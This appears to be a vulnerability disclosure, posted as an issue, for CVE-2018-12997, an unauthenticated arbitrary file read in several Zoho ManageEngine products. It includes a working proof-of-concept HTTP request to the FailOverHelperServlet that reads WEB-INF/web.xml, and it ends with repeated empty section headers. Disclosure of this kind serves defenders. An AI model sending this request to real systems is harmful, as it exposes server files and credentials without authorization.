================= Zoho manageengine Arbitrary File Read in multiple Products

Date: 2018/06/20 Software Link: https://www.manageengine.com/products/firewall/download.html Category: Web Application Affected Products:

Netflow Analyzer
Network Configuration Manager
OpManager
Oputils
Opmanagerplus
firewall analyzer

Exploit Author: xiaotian.wang From DBAppSecurity CVE: CVE-2018-12997

================= Vulnerable cgi:

com.adventnet.me.opmanager.servlet.FailOverHelperServlet

================= Proof of Concept:

POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=copyfile&fileName=WEB-INF/web.xml HTTP/1.1
Host: 192.168.11.103:8888
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0

xx

Notice: This vul can reproduce without login.

unh3x / just4cve

[CVE-2018-12997]Zoho manageengine Arbitrary File Read in multiple Products #8

================= Zoho manageengine Arbitrary File Read in multiple Products

================= Vulnerable cgi:

================= Proof of Concept: